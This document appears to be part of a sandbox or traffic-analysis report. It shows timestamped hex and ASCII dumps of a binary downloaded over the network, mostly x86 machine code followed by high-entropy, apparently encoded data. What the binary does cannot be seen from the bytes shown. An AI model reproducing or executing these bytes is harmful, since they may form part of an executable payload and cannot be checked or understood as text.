                                                                                                                                                                                    Data Ascii: L$(s)9v9Cw'L$,D$SD$$L$H[^_t$T$D$>X$XqST$(D$ D$T$T$$$PT$[SD$T$uFX[L$[FXSD$(D$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC464INData Raw: bb b0 03 00 89 c3 8d 4d f0 e8 91 06 00 00 89 1c 24 e8 59 df fa ff 89 c3 e8 12 ad 03 00 eb e7 e8 9b b0 03 00 e8 06 ab 03 00 8b 06 8b 50 f4 01 f2 83 4a 14 01 f6 42 10 01 75 0a e8 f0 ac 03 00 e9 13 ff ff ff e8 76 b0 03 00 89 c3 e8 df ac 03 00 eb b4 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 83 ec 14 8b 5c 24 20 8b 03 03 58 f4 8b 01 03 48 f4 89 1c 24 89 ce e8 13 13 03 00 8d 46 6c 83 ec 04 89 f1 89 04 24 e8 43 22 03 00 8d 43 6c 83 ec 04 89 d9 89 04 24 e8 33 22 03 00 8b 46 70 8b 53 70 83 ec 04 89 56 70 89 43 70 0f b6 53 74 0f b6 46 74 88 56 74 88 43 74 0f b6 53 75 0f b6 46 75 88 56 75 88 43 75 83 c4 14 5b 5e c2 04 00 53 89 cb 83 ec 18 8b 01 8b 40 f4 8b 4c 01 78 85 c9 74 22 8b 01 ff 50 18 83 f8 ff 75 18 8b 03 8b 48 f4 01 d9 8b 41 14 83 c8 01 89 04 24 e8 5e 24
                                                                                                                                                                                    Data Ascii: M$YPJBuvVS\$ XH$Fl$C"Cl$3"FpSpVpCpStFtVtCtSuFuVuCu[^S@Lxt"PuHA$^$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC480INData Raw: 24 e8 f9 df ff ff 89 03 83 c4 18 5b c2 0c 00 53 89 cb 83 ec 18 8b 44 24 28 c6 44 24 0c 00 89 44 24 08 8b 44 24 24 89 44 24 04 8b 44 24 20 89 04 24 e8 a9 e0 ff ff 89 03 83 c4 18 5b c2 0c 00 8b 44 24 04 8b 10 89 11 c7 00 fc 46 58 00 c2 04 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 89 ce b8 ff ff ff ff 83 ec 14 8b 5c 24 20 85 db 74 0a 89 1c 24 e8 34 64 fb ff 01 d8 8b 54 24 24 89 1c 24 c6 44 24 0c 00 89 44 24 04 89 54 24 08 e8 69 df ff ff 89 06 83 c4 14 5b 5e c2 08 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 18 8b 54 24 28 8b 44 24 20 c6 44 24 0c 00 89 54 24 08 8b 54 24 24 89 04 24 01 c2 89 54 24 04 e8 27 df ff ff 89 03 83 c4 18 5b c2 0c 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 c7 01 fc 46 58 00 c2 04 00 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: $[SD$(D$D$D$$D$D$ $[D$FXVS\$ t$4dT$$$D$D$T$i[^ST$(D$ D$T$T$$$T$'[FX
                                                                                                                                                                                    2022-05-23 16:54:51 UTC496INData Raw: 58 00 8b 74 24 50 8b 5c 24 48 8b 01 8b 54 24 4c 89 74 24 18 89 5c 24 10 8b 74 24 44 8b 5c 24 40 89 54 24 14 89 5c 24 08 89 74 24 0c 8b 5c 24 38 8b 74 24 3c 89 1c 24 89 74 24 04 ff 50 1c 83 ec 1c 83 c4 24 5b 5e c3 90 8d b4 26 00 00 00 00 8b 54 24 50 8b 01 8b 5c 24 40 8b 74 24 44 89 54 24 18 8b 54 24 4c 89 5c 24 08 89 74 24 0c 8b 5c 24 38 8b 74 24 3c 89 54 24 14 8b 54 24 48 89 1c 24 89 74 24 04 89 54 24 10 ff 50 10 83 ec 1c 83 c4 24 5b 5e c3 8b 5c 24 48 8b 01 8b 54 24 50 8b 74 24 44 89 5c 24 10 8b 5c 24 40 89 54 24 18 89 74 24 0c 8b 54 24 4c 8b 74 24 3c 89 5c 24 08 8b 5c 24 38 89 74 24 04 89 54 24 14 89 1c 24 ff 50 18 83 ec 1c 83 c4 24 5b 5e c3 8d b6 00 00 00 00 8b 54 24 50 8b 01 8b 5c 24 40 8b 74 24 44 89 54 24 18 8b 54 24 4c 89 5c 24 08 89 74 24 0c 8b 5c
                                                                                                                                                                                    Data Ascii: Xt$P\$HT$Lt$\$t$D\$@T$\$t$\$8t$<$t$P$[^&T$P\$@t$DT$T$L\$t$\$8t$<T$T$H$t$T$P$[^\$HT$Pt$D\$\$@T$t$T$Lt$<\$\$8t$T$$P$[^T$P\$@t$DT$T$L\$t$\
                                                                                                                                                                                    2022-05-23 16:54:51 UTC512INData Raw: 0b e9 02 00 8b 06 8d 4d d0 89 34 24 ff 50 1c 8b 7d d4 83 ec 04 8d 47 01 89 04 24 e8 0f e9 02 00 8d 4d d0 c7 44 24 08 00 00 00 00 89 7c 24 04 89 04 24 89 45 c4 e8 65 cc fb ff 8b 45 c4 8d 55 d8 83 ec 0c 89 7b 28 c6 04 38 00 89 43 24 8b 45 d0 39 d0 74 08 89 04 24 e8 b3 e8 02 00 8b 06 89 f1 ff 50 24 0f be fc 88 43 30 89 c1 89 c2 89 f8 c1 e9 10 88 43 31 8b 06 c1 fa 18 88 4b 32 88 53 33 89 f1 ff 50 28 0f be f4 89 c1 89 c2 88 43 34 c1 e9 10 89 f0 c1 fa 18 88 43 35 88 4b 36 88 53 37 8d 65 f4 5b 5e 5f 5d c3 8b 55 d0 89 c3 8d 45 d8 39 c2 74 08 89 14 24 e8 53 e8 02 00 89 1c 24 e8 ab 1e fa ff eb e2 eb e0 eb de 90 90 90 90 90 55 89 e5 57 56 53 83 ec 3c 8b 75 0c 8b 5d 10 8b 06 89 f1 ff 50 08 88 43 11 8b 06 89 f1 ff 50 0c 88 43 12 8b 06 89 f1 ff 50 20 89 43 2c 8b 06 8d
                                                                                                                                                                                    Data Ascii: M4$P}G$MD$|$$EeEU{(8C$E9t$P$C0C1K2S3P(C4C5K6S7e[^_]UE9t$S$UWVS<u]PCPCP C,
                                                                                                                                                                                    2022-05-23 16:54:51 UTC528INData Raw: 45 fe ff ff 8b 49 04 8b 47 08 31 f6 e9 11 fe ff ff 8b 57 44 8b 47 40 83 fa 01 89 47 04 89 47 08 89 47 0c 0f 86 ee fe ff ff 89 47 14 89 47 10 8d 44 50 fe 89 47 18 e9 f1 fe ff ff 31 f6 e9 20 ff ff ff c7 04 24 fc 8a 58 00 e8 b1 48 02 00 e8 2c 47 02 00 90 90 90 90 90 90 90 90 90 90 90 90 55 57 56 53 89 cb 83 ec 1c f6 41 30 11 8b 49 5c 8b 7c 24 30 8b 74 24 34 0f 95 c0 85 c9 0f 84 00 01 00 00 89 c5 8b 01 ff 50 18 84 c0 0f 84 7e 00 00 00 89 e8 84 c0 74 78 80 7b 49 00 75 72 8b 53 14 8b 43 18 29 d0 d1 f8 80 7b 4a 00 75 0b 8b 4b 44 83 f9 01 76 03 8d 41 ff 3d ff 03 00 00 b9 00 04 00 00 7f 02 89 c1 39 f1 7f 45 8b 43 10 8d 4b 28 89 74 24 0c 89 7c 24 08 29 c2 89 04 24 d1 fa 89 d5 89 54 24 04 01 ee e8 43 72 ff ff 83 ec 10 39 f0 74 3c 31 d2 39 c5 7d 04 29 e8 89 c2 83 c4
                                                                                                                                                                                    Data Ascii: EIG1WDG@GGGGGDPG1 $XH,GUWVSA0I\|$0t$4P~tx{IurSC){JuKDvA=9ECK(t$|$)$T$Cr9t<19})
                                                                                                                                                                                    2022-05-23 16:54:51 UTC544INData Raw: 04 01 00 00 00 66 89 02 83 c4 28 89 d8 5b c2 04 00 e8 19 6b 02 00 8b 03 8b 50 f4 01 da 83 4a 14 01 f6 42 10 01 0f 85 87 00 00 00 e8 ff 6c 02 00 8b 53 04 b8 04 00 00 00 85 d2 75 cc 8b 13 8b 4a f4 01 d9 0b 41 14 89 04 24 e8 41 ed 01 00 83 ec 04 89 d8 83 c4 28 5b c2 04 00 90 8d 74 26 00 8b 01 ff 50 28 eb 8e 89 f6 8d bc 27 00 00 00 00 83 7b 04 01 19 c0 83 e0 04 83 c0 02 eb bf 83 ea 01 89 04 24 75 8c e8 a5 6a 02 00 8b 03 03 58 f4 83 4b 14 01 f6 43 10 01 74 14 e8 21 70 02 00 89 c3 e8 8a 6c 02 00 89 1c 24 e8 c2 9e f9 ff e8 0d 70 02 00 e8 08 70 02 00 89 c3 e8 71 6c 02 00 89 1c 24 e8 a9 9e f9 ff 90 90 90 90 90 90 90 90 90 53 89 cb 83 ec 28 c7 41 04 00 00 00 00 89 0c 24 8d 4c 24 1f c7 44 24 04 01 00 00 00 e8 4f 0e 00 00 83 ec 08 80 7c 24 1f 00 75 45 8b 53 04 b8 04
                                                                                                                                                                                    Data Ascii: f([kPJBlSuJA$A([t&P('{$ujXKCt!pl$ppql$S(A$L$D$O|$uES
                                                                                                                                                                                    2022-05-23 16:54:51 UTC560INData Raw: 44 24 04 8b 44 24 20 89 04 24 e8 40 57 ff ff 83 ec 08 85 c0 8b 03 74 1b 03 58 f4 c7 04 24 00 00 00 00 89 d9 e8 36 a5 01 00 83 ec 04 83 c4 18 5b c2 08 00 03 58 f4 8b 43 14 89 d9 83 c8 04 89 04 24 e8 19 a5 01 00 83 ec 04 83 c4 18 5b c2 08 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 53 89 cb 83 c1 08 83 ec 18 8b 44 24 24 83 c8 08 89 44 24 04 8b 44 24 20 8b 00 89 04 24 e8 ce 56 ff ff 83 ec 08 85 c0 8b 03 74 25 03 58 f4 c7 04 24 00 00 00 00 89 d9 e8 c4 a4 01 00 83 ec 04 83 c4 18 5b c2 08 00 8d 76 00 8d bc 27 00 00 00 00 03 58 f4 8b 43 14 89 d9 83 c8 04 89 04 24 e8 9d a4 01 00 83 ec 04 83 c4 18 5b c2 08 00 90 90 90 55 57 89 cf 56 53 83 ec 1c 8b 6c 24 30 8b 45 00 8b 58 f4 8b 01 8b 70 f4 01 eb 83 c5 08 89 1c 24 01 ce 89 f1 e8 97 92 01 00 8d 46 6c 83 ec 04 89
                                                                                                                                                                                    Data Ascii: D$D$ $@WtX$6[XC$[SD$$D$D$ $Vt%X$[v'XC$[UWVSl$0EXp$Fl
                                                                                                                                                                                    2022-05-23 16:54:51 UTC576INData Raw: 73 08 89 34 24 e8 d5 99 00 00 c7 44 24 08 00 00 00 00 89 6c 24 04 89 34 24 e8 51 99 00 00 83 c4 1c 5b 5e 5f 5d c2 08 00 c7 03 74 ed 58 00 89 34 24 89 c7 e8 a7 99 00 00 89 d9 e8 d0 99 00 00 89 3c 24 e8 28 1f f9 ff 89 c6 89 d9 e8 bf 99 00 00 89 34 24 e8 17 1f f9 ff 90 90 90 90 90 90 90 55 57 56 53 89 cb 83 ec 1c 8b 44 24 30 8b 54 24 34 8b 28 31 c0 85 d2 0f 95 c0 c7 01 74 ed 58 00 89 41 04 e8 68 98 00 00 89 43 08 c7 03 34 e6 58 00 bf 50 5e 58 00 b9 02 00 00 00 89 ee f3 a6 74 10 bf 52 5e 58 00 b9 06 00 00 00 89 ee f3 a6 75 0f 83 c4 1c 5b 5e 5f 5d c2 08 00 90 8d 74 26 00 8d 73 08 89 34 24 e8 15 99 00 00 c7 44 24 08 00 00 00 00 89 6c 24 04 89 34 24 e8 91 98 00 00 83 c4 1c 5b 5e 5f 5d c2 08 00 c7 03 74 ed 58 00 89 34 24 89 c7 e8 e7 98 00 00 89 d9 e8 10 99 00 00
                                                                                                                                                                                    Data Ascii: s4$D$l$4$Q[^_]tX4$<$(4$UWVSD$0T$4(1tXAhC4XP^XtR^Xu[^_]t&s4$D$l$4$[^_]tX4$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC592INData Raw: 5e 5f 5d c2 08 00 89 c6 89 d9 e8 b0 51 fe ff 89 34 24 e8 58 df f8 ff 89 c6 89 d9 e8 ef 59 00 00 89 34 24 e8 47 df f8 ff 90 90 90 90 90 90 90 55 31 c0 89 e5 57 56 53 89 cb 83 ec 2c 8b 55 0c c7 01 dc e1 58 00 c7 41 08 00 00 00 00 85 d2 0f 95 c0 89 41 04 c7 44 24 04 00 00 00 00 c7 04 24 00 00 00 00 e8 c7 4d fe ff 8b 75 08 c7 03 c0 e8 58 00 bf 50 5e 58 00 b9 02 00 00 00 83 ec 08 f3 a6 74 11 8b 75 08 bf 52 5e 58 00 b9 06 00 00 00 f3 a6 75 0c 8d 65 f4 5b 5e 5f 5d c2 08 00 66 90 8b 45 08 8d 75 e4 c7 44 24 08 00 00 00 00 89 34 24 89 44 24 04 e8 b6 58 00 00 8b 45 e4 c7 44 24 04 00 00 00 00 89 d9 89 04 24 e8 61 4d fe ff 83 ec 08 89 34 24 e8 06 59 00 00 8d 65 f4 5b 5e 5f 5d c2 08 00 89 c6 89 d9 e8 d3 50 fe ff 89 34 24 e8 7b de f8 ff 89 c6 89 d9 e8 12 59 00 00 89 34
                                                                                                                                                                                    Data Ascii: ^_]Q4$XY4$GU1WVS,UXAAD$$MuXP^XtuR^Xue[^_]fEuD$4$D$XED$$aM4$Ye[^_]P4${Y4
                                                                                                                                                                                    2022-05-23 16:54:51 UTC608INData Raw: 44 24 1c 89 04 24 e8 14 7a f8 ff 85 c0 0f 84 55 ff ff ff c7 04 24 04 00 00 00 e8 50 6a 01 00 c7 00 dc d7 58 00 c7 44 24 08 f0 1c 43 00 c7 44 24 04 74 a4 58 00 89 04 24 e8 e2 70 01 00 66 90 8b 57 0c c1 e3 02 bd ff ff ff ff 8d 0c 1a 8b 01 85 c0 0f 85 f8 fe ff ff 83 3d 34 90 5c 00 00 8d 46 04 75 2d 83 46 04 01 83 fd ff 89 31 0f 84 f6 fe ff ff 83 46 04 01 31 c9 89 34 aa e9 e0 fe ff ff 8b 0a 89 dd e8 36 17 fa ff 89 c3 e9 ac fe ff ff f0 83 00 01 8b 57 0c 8b 0d 34 90 5c 00 83 fd ff 89 34 1a 0f 84 b7 fe ff ff 85 c9 74 c5 f0 83 00 01 8b 0d 34 90 5c 00 8b 57 0c eb bc 89 c3 c7 04 24 50 35 58 00 e8 15 6e 01 00 89 1c 24 e8 9d 9e f8 ff 83 fa ff 89 04 24 74 05 e8 90 9e f8 ff e8 0b 6b 01 00 8d 4c 24 1c 89 c3 e8 20 7c f9 ff 89 1c 24 eb e6 90 90 90 90 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: D$$zU$PjXD$CD$tX$pfW=4\Fu-F1F146W4\4t4\W$P5Xn$$tkL$ |$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC624INData Raw: ec 1c 8b 51 04 8b 44 24 20 39 d0 77 29 8b 54 24 28 c7 44 24 04 00 00 00 00 89 04 24 89 54 24 0c 8b 54 24 24 89 54 24 08 e8 d2 ec ff ff 83 ec 10 83 c4 1c c2 0c 00 89 54 24 0c 89 44 24 08 c7 44 24 04 be 64 58 00 c7 04 24 fc 63 58 00 e8 7d d0 00 00 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 83 ec 14 8b 54 24 24 8b 44 24 20 8b 72 04 8b 1a 8b 51 04 39 d0 77 23 89 74 24 0c 89 5c 24 08 c7 44 24 04 00 00 00 00 89 04 24 e8 6f ec ff ff 83 ec 10 83 c4 14 5b 5e c2 08 00 89 54 24 0c 89 44 24 08 c7 44 24 04 be 64 58 00 c7 04 24 fc 63 58 00 e8 18 d0 00 00 90 90 90 90 90 90 90 90 55 57 56 53 83 ec 1c 8b 54 24 34 8b 44 24 38 8b 6c 24 3c 8b 7c 24 30 8b 72 04 89 f3 29 c3 39 eb 76 02 89 eb 39 f0 8b 12 77 29 01 d0 8b 51 04 39 d7 77 3c 89 5c 24 3c 89 7c 24 30 89 44 24 38 c7
                                                                                                                                                                                    Data Ascii: QD$ 9w)T$(D$$T$T$$T$T$D$D$dX$cX}VST$$D$ rQ9w#t$\$D$$o[^T$D$D$dX$cXUWVST$4D$8l$<|$0r)9v9w)Q9w<\$<|$0D$8
                                                                                                                                                                                    2022-05-23 16:54:51 UTC640INData Raw: 8b 44 24 2c 89 2b 89 43 08 83 c4 3c 5b 5e 5f 5d c2 10 00 0f b7 00 66 89 06 eb d7 8d 74 26 00 0f b7 00 66 89 45 00 e9 62 ff ff ff 8d 74 26 00 8b 54 24 58 0f b7 0a 66 89 08 eb 89 8d 74 26 00 b8 07 00 00 00 e9 0e ff ff ff 90 90 90 90 90 90 8b 44 24 08 8b 4c 24 04 8b 54 24 0c 83 f8 01 74 23 85 c0 75 0b f3 c3 89 f6 8d bc 27 00 00 00 00 0f b7 d2 89 44 24 0c 89 4c 24 04 89 54 24 08 e9 cc 8f f8 ff 66 89 11 c3 90 90 90 90 90 90 90 90 55 57 8d 51 08 56 53 89 cb 83 ec 1c 8b 01 8b 71 04 8b 6c 24 30 39 d0 8d 7e 01 74 46 8b 51 08 39 d7 76 27 c7 44 24 0c 01 00 00 00 c7 44 24 08 00 00 00 00 89 d9 c7 44 24 04 00 00 00 00 89 34 24 e8 4b fe ff ff 8b 03 83 ec 10 31 d2 66 89 2c 70 89 7b 04 66 89 54 70 02 83 c4 1c 5b 5e 5f 5d c2 04 00 ba 07 00 00 00 eb b6 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: D$,+C<[^_]ft&fEbt&T$Xft&D$L$T$t#u'D$L$T$fUWQVSql$09~tFQ9v'D$D$D$4$K1f,p{fTp[^_]
                                                                                                                                                                                    2022-05-23 16:54:51 UTC656INData Raw: 31 c0 89 cb 83 ec 18 c7 01 58 ed 58 00 8b 54 24 24 85 d2 0f 95 c0 89 41 04 8d 44 24 20 89 04 24 e8 3a 59 ff ff 89 43 08 83 c4 18 5b c2 08 00 56 53 31 c0 89 cb 83 ec 14 c7 01 58 ed 58 00 8b 54 24 20 85 d2 0f 95 c0 89 41 04 e8 a0 58 ff ff 89 43 08 83 c4 14 5b 5e c2 04 00 89 c6 89 d9 e8 ac 59 ff ff 89 34 24 e8 04 df f7 ff 90 90 90 90 53 8d 41 08 89 cb 83 ec 18 c7 01 58 ed 58 00 89 04 24 e8 59 59 ff ff 89 d9 e8 82 59 ff ff 89 1c 24 e8 7a a8 00 00 83 c4 18 5b c3 90 90 90 90 90 53 8d 41 08 89 cb 83 ec 18 c7 01 58 ed 58 00 89 04 24 e8 29 59 ff ff 83 c4 18 89 d9 5b e9 4e 59 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90 53 8d 41 08 89 cb 83 ec 18 c7 01 58 ed 58 00 89 04 24 e8 f9 58 ff ff 83 c4 18 89 d9 5b e9 1e 59 ff ff 90 90 90 90 90 90 90 90 90 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: 1XXT$$AD$ $:YC[VS1XXT$ AXC[^Y4$SAXX$YYY$z[SAXX$)Y[NYSAXX$X[Y
                                                                                                                                                                                    2022-05-23 16:54:51 UTC672INData Raw: 04 24 e8 a8 64 f8 ff 8d 70 01 89 34 24 e8 1d 69 00 00 89 74 24 08 89 5c 24 04 89 c7 89 04 24 e8 f3 64 f8 ff c7 44 24 04 50 5e 58 00 c7 04 24 04 00 00 00 e8 b7 64 f8 ff 8d 44 24 40 89 6c 24 08 89 44 24 0c 8b 44 24 38 89 44 24 04 8b 44 24 34 89 04 24 e8 e7 ec f7 ff 89 7c 24 04 c7 04 24 04 00 00 00 89 c3 e8 85 64 f8 ff 89 3c 24 e8 8d 68 00 00 83 c4 1c 89 d8 5b 5e 5f 5d c3 90 90 90 55 89 e5 57 56 53 8d 4d e0 83 ec 3c 8b 5d 08 89 1c 24 e8 29 c5 fc ff 83 ec 04 80 7d e0 00 0f 84 b1 00 00 00 8b 03 8b 40 f4 8d 3c 03 8b 77 08 39 75 10 89 75 d0 0f 8d f8 00 00 00 8b 57 0c 81 e2 b0 00 00 00 83 fa 20 89 55 cc 74 77 2b 75 10 80 7f 75 00 0f 84 dc 01 00 00 0f b6 57 74 88 55 d4 0f b6 7d d4 eb 22 8d 76 00 8d bc 27 00 00 00 00 0f b6 55 d4 88 10 83 41 14 01 83 ee 01 8b 03 0f
                                                                                                                                                                                    Data Ascii: $dp4$it$\$$dD$P^X$dD$@l$D$D$8D$D$4$|$$d<$h[^_]UWVSM<]$)}@<w9uuW Utw+uuWtU}"v'UA
                                                                                                                                                                                    2022-05-23 16:54:51 UTC688INData Raw: 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 83 ec 14 8b 5c 24 24 8b 74 24 20 85 db 74 20 89 1c 24 e8 87 24 f8 ff 89 5c 24 04 89 34 24 89 44 24 08 e8 47 c0 ff ff 83 c4 14 89 f0 5b 5e c3 8b 06 8b 48 f4 01 f1 8b 41 14 83 c8 01 89 04 24 e8 0a a5 ff ff 83 ec 04 89 f0 83 c4 14 5b 5e c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 56 53 83 ec 14 8b 5c 24 24 8b 74 24 20 85 db 74 20 89 1c 24 e8 27 24 f8 ff 89 5c 24 04 89 34 24 89 44 24 08 e8 e7 bf ff ff 83 c4 14 89 f0 5b 5e c3 8b 06 8b 48 f4 01 f1 8b 41 14 83 c8 01 89 04 24 e8 aa a4 ff ff 83 ec 04 89 f0 83 c4 14 5b 5e c3 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 83 ec 2c 8b 44 24 34 c7 44 24 08 01 00 00 00 88 44 24 1f 8d 44 24 1f 89 44 24 04 8b 44 24 30 89 04 24 e8 89 bf ff ff 83 c4 2c c3 90 90 90 90 90
                                                                                                                                                                                    Data Ascii: VS\$$t$ t $$\$4$D$G[^HA$[^VS\$$t$ t $'$\$4$D$[^HA$[^,D$4D$D$D$D$D$0$,
                                                                                                                                                                                    2022-05-23 16:54:51 UTC704INData Raw: 8d 8e 20 01 00 00 01 f9 89 8d f0 fe ff ff 8d 8e 2b 01 00 00 03 8d 68 ff ff ff 89 8d ec fe ff ff 8d 8e ec 00 00 00 03 8d 60 ff ff ff 89 8d e8 fe ff ff 8d 8e f3 00 00 00 0f af 4d 80 89 8d 30 fe ff ff 8d 8e 40 01 00 00 0f af 8d f4 fe ff ff 89 8d 2c fe ff ff 8d 8e 28 01 00 00 0f af 8d 5c ff ff ff 89 8d 28 fe ff ff 8d 8e f9 00 00 00 0f af 8d 74 ff ff ff 39 8d cc fe ff ff 7f 12 8d 8e fd 00 00 00 03 8d 14 ff ff ff 89 8d 4c ff ff ff 8d 8e ec 00 00 00 0f af 8d fc fe ff ff 89 8d 24 fe ff ff 8d 8e 0c 01 00 00 0f af cb 0f af 9d 34 ff ff ff 89 8d 2c fd ff ff 89 9d 28 fd ff ff 8d 9e 0d 01 00 00 0f af 5d 80 89 9d 20 fe ff ff 8d 9e 68 01 00 00 0f af 9d 6c ff ff ff 89 9d e4 fe ff ff 8d 9e 60 01 00 00 03 9d 98 fe ff ff 89 9d e0 fe ff ff 8d 9e 65 01 00 00 01 fb 89 9d 54 ff
                                                                                                                                                                                    Data Ascii: +h`M0@,(\(t9L$4,(] hl`eT
                                                                                                                                                                                    2022-05-23 16:54:51 UTC720INData Raw: 16 00 00 ff ff 01 10 34 05 bd 01 00 85 01 1d ac 01 00 b8 01 16 00 00 ff ff 01 08 35 05 46 00 52 05 00 00 ff ff 01 08 35 05 46 00 52 05 00 00 ff ff 01 08 34 05 45 00 51 05 00 00 ff ff 01 08 34 05 45 00 51 05 00 00 ff 00 1d 01 15 4a 05 a7 01 01 71 05 96 01 00 a2 01 05 00 00 c2 01 05 c7 01 00 01 00 00 00 00 00 ff 00 1d 01 15 4a 05 a7 01 01 71 05 96 01 00 a2 01 05 00 00 c2 01 05 c7 01 00 01 00 00 00 00 00 ff ff 01 00 ff ff 01 08 1b 05 2b 00 37 05 00 00 ff ff 01 08 1b 05 2b 00 37 05 00 00 ff ff 01 08 1b 05 2b 00 37 05 00 00 ff ff 01 08 1b 05 2b 00 37 05 00 00 ff ff 01 00 ff ff 01 0d 1b 05 00 00 56 19 79 00 93 01 05 00 00 ff ff 01 0d 1b 05 00 00 56 19 79 00 93 01 05 00 00 ff ff 01 00 ff ff 01 0d 1b 05 00 00 56 19 79 00 85 01 05 00 00 ff ff 01 0d 1b 05 00 00 56
                                                                                                                                                                                    Data Ascii: 45FR5FR4EQ4EQJqJq+7+7+7+7VyVyVyV
                                                                                                                                                                                    2022-05-23 16:54:51 UTC736INData Raw: 04 03 a9 04 05 d0 04 00 c4 04 1b 00 00 df 04 05 d0 04 00 e4 04 05 e9 04 00 f3 04 05 00 00 02 00 01 7d 00 00 00 00 00 d4 a3 58 00 ff 00 11 01 0a 2d 4e aa 01 01 b2 01 0a 00 00 7f 00 00 00 00 00 00 00 00 ff 00 11 01 0a 2d 05 ac 01 01 b4 01 0a 00 00 7f 00 00 00 00 00 00 00 00 ff ff 01 0c 16 03 25 00 20 05 00 00 31 05 00 00 ff ff 01 0c 16 03 25 00 20 05 00 00 31 05 00 00 ff 00 11 01 08 1b 05 2d 03 40 0a 00 00 7f 00 00 7d 00 00 00 00 00 00 00 ff ff 01 08 1a 05 2b 00 37 05 00 00 ff ff 01 08 1a 05 2b 00 37 05 00 00 ff ff 01 0c 16 03 25 00 20 05 00 00 31 05 00 00 ff ff 01 0c 16 03 25 00 20 05 00 00 31 05 00 00 ff ff 01 0c 16 03 25 00 20 05 00 00 31 05 00 00 ff ff 01 0c 16 03 25 00 20 05 00 00 31 05 00 00 ff 00 55 01 43 1d 29 00 00 64 05 a1 07 03 9d 01 05 89 07 05
                                                                                                                                                                                    Data Ascii: }X-N-% 1% 1-@}+7+7% 1% 1% 1% 1UC)d
                                                                                                                                                                                    2022-05-23 16:54:51 UTC752INData Raw: 00 73 2d 9c e3 91 5c 21 e8 b2 b5 60 40 d3 a4 88 0b 15 ac 63 1d a5 92 64 d8 8c 24 8c 8c ac 8c 15 43 54 31 d9 a5 7c 43 8d 14 0e e8 d8 b3 b9 db ad 9c e3 a2 58 d9 7a 89 2a 84 eb 05 58 30 68 cd 67 50 e8 7b 3c 54 30 53 0d 14 11 a8 30 4c 41 c8 3b a4 58 63 cd 34 20 1d e5 e9 d8 ea 71 db b5 9c 88 fb 3d 51 70 8b 25 7c eb a5 0d a2 84 80 9c 9c bd 73 14 01 e9 95 bc 63 05 bc a6 40 40 fb 71 eb 05 14 03 0a c0 61 c2 61 92 84 fb 15 f0 30 88 9d 66 50 70 83 a4 84 30 cb 1d 9c d1 68 60 5c e9 f8 7b 94 68 53 0d 14 a8 e5 4d 41 40 a2 b9 eb 1d 14 68 83 a5 e9 c8 63 9d 7c fb b5 a5 a2 64 60 9c 9c 25 8b 8c d1 e9 0d ac eb c5 7c 96 50 e8 cb 31 db 35 24 c3 2a 48 c9 6a c9 0a cc 33 25 58 b8 68 65 fe e8 c8 6b 1c 84 20 db b5 9c 31 88 40 5c 71 00 e3 44 68 cb 1d 9c 68 d5 7d 51 e8 92 f9 db 2d 24
                                                                                                                                                                                    Data Ascii: s-\!`@cd$CT1|CXz*X0hgP{<T0S0LA;Xc4 q=Qp%|sc@@qaa0fPp0h`\{hSMA@hc|d`%|P15$*Hj3%Xhek 1@\qDhh}Q-$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC768INData Raw: 11 32 0b 2d b8 b8 d5 9e 81 50 db ad 04 73 58 e9 95 a4 63 15 bc eb 42 c3 08 a8 eb 1d 14 09 c9 43 ad 2c 63 3d dd b2 54 f8 ac ac ac 9c 9c bc cc 35 0b 8c c3 bc 7c 09 cd a8 db ad 00 71 15 94 53 0d 1c c3 81 64 c9 0d 34 33 35 58 ba 68 f7 3f 17 37 6b 1c 84 f9 15 08 eb 25 9c db 58 21 e8 4e 77 9f bf d3 a4 84 09 15 bc 63 b5 00 b8 90 ce 41 e8 c9 05 88 cb 15 38 ea eb 15 04 d0 43 85 00 99 00 74 bf 70 50 7b a4 6c eb 05 ac fb 02 30 0b 2d bc db 71 d2 0b 1d a8 00 dd e6 51 60 53 05 14 cb 48 e9 0d a4 43 ed 9c db ea 03 08 d8 63 85 14 51 81 fb 15 1c eb 85 3d 92 54 70 cc ac 4c ac 8c 9c ac d5 0b bc d3 04 e4 71 1d 98 53 05 10 c9 05 94 cb 0d 3c 3b a1 54 61 cd 34 43 bd c0 ba 30 2f 86 af 07 e3 a4 64 d9 15 80 8b 25 7c eb 48 01 88 1e 76 af af 6b 3c fc d9 25 34 cb a5 b8 a8 00 56 41 c8
                                                                                                                                                                                    Data Ascii: 2-PsXcBC,c=T5|qSd435Xh?7k%X!NwcA8CtpP{l0-qQ`SHCcQ=TpLqS<;Ta4C0/d%|Hvk<%4VA
                                                                                                                                                                                    2022-05-23 16:54:51 UTC784INData Raw: 84 00 3a f8 10 ce e1 60 d8 c3 2c 48 c9 25 b8 cb 85 a8 31 b8 9f 37 37 37 6b 0c ec 51 c5 8c db ad 9c 32 eb 1d a8 98 45 e0 7f 9f cb b5 3d 43 4c 05 db 04 7b 14 58 eb 9d 4c b8 a8 11 d7 bf bf 4b 7c 64 00 82 90 20 3e 58 c8 e8 5b 44 78 d9 bd 98 eb 2d 40 01 98 37 d7 7f 9f c3 94 64 09 c5 ac db bd 04 aa db 2d 20 a8 bd c0 bf 9f cb a5 95 7b ac 05 63 6c 4b 24 e0 43 ad d4 d0 98 41 4f 9f 9f e3 94 54 20 6a 70 68 d6 f0 50 60 03 44 58 d9 ad 00 73 1d 70 89 a8 1f f6 bf 9f c3 84 cc 31 25 ac 63 d5 34 9a 63 85 10 30 e5 f0 af 07 eb 85 3d 93 9c 25 8b 8c d1 eb 05 58 e3 40 88 d9 15 14 73 b5 58 6f 6e 51 ba cb 0d 9c a8 24 c6 b9 60 db ad 88 0e c8 eb 43 a5 d4 d1 98 c5 ff 60 60 e3 94 54 fb 55 68 09 22 48 3a 61 0b cd 58 b8 fa 15 f8 50 eb 